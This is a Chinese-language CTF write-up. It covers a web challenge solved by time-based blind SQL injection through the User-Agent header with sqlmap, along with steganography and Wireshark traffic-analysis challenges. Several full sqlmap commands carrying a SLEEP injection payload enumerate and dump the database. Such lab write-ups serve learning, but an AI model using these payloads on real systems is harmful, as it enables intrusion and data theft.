web
简简单单的sql
需要寻找SQL,考核的时候dirsearch扫描到了login.php
是个登录框,进行了爆破尝试,密码用admin,尝试在用户名出进行注入点的判断
但是回显 NO SQL,一开始我以为是盲注,结果确实是盲注,只是不在这个页面
已经明确是SQL的话,利用sqlmap来扫描一下,发现常规扫描没有发现,再结合登录页面,说明要在登录的后的页面进行注入,输入用户名和密码进行抓包
下载POST传参的信息,利用sqlmap进行扫描,要设置测试的等级(测试等级到3就够用,要到5也没意见)前面对于sqlmap的了解不多,用这题也可以好好学习一下
sqlmap -r xxxxx --level 3
通过扫描知道注入类型和payload(前面扫描出来都不知道怎么利用)
在UA头扫描发现的,所以在UA头处进行时间盲注,指定UA头
sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" --dbs
爆出所有数据库
爆现在所处的数据库
sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" --current-db
爆表
sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges --tables
存在两张表,需要一张一张看
在第一张表里,爆字段
sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges -T user_agents --columns
长度为40的字段就是flag
查询字段内容
sqlmap -r /home/kali/桌面/1.txt --level 5 --headers="User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' AND (SELECT 3968 FROM (SELECT(SLEEP(5)))Gujs)-- KBZW" -D challenges -T user_agents -C user_agent --dump
拿到flag
Misc
Xjpg
下载附件,题目提示为f5,猜测f5隐写
用F5-steganography进行解密
打开output.txt查看
乱码,用010editor打开
pk头,把文件改为zip,解压后查看文本
brainfuck解码
流量分析1
下载附件,用wireshark进行分析
导出http对象,发现666.zip
给了很多文件
关于png的头部为:89 50 4E 47
尾部为:AE 42 60 82
查看6个文件,发现1.txt和6.txt分别为头部和尾部,说明6个txt为一张png
把16进制导入010中,另存为png图片,得到二维码
扫描二维码得到flag
流量分析3
下载得到rar文件,重命名一下,解压
flag应该在flag.docx文件中, 但是有加密
流量分析是key,那么流量分析拿密钥
看见usb,应该是键鼠流量分析
the key is qazwsxedcrfv
解密flag.docx
流量分析2
下载附件,用wireshark打开,是sql盲注的流量分析
过滤包含flag的http
根据盲注是一个一个字符去尝试,当从(1,1)到(2,1)时,说明第一个字符正确
102对照ACill表 是f,依次对照
flag为flag{skysql_is_very_cool!233}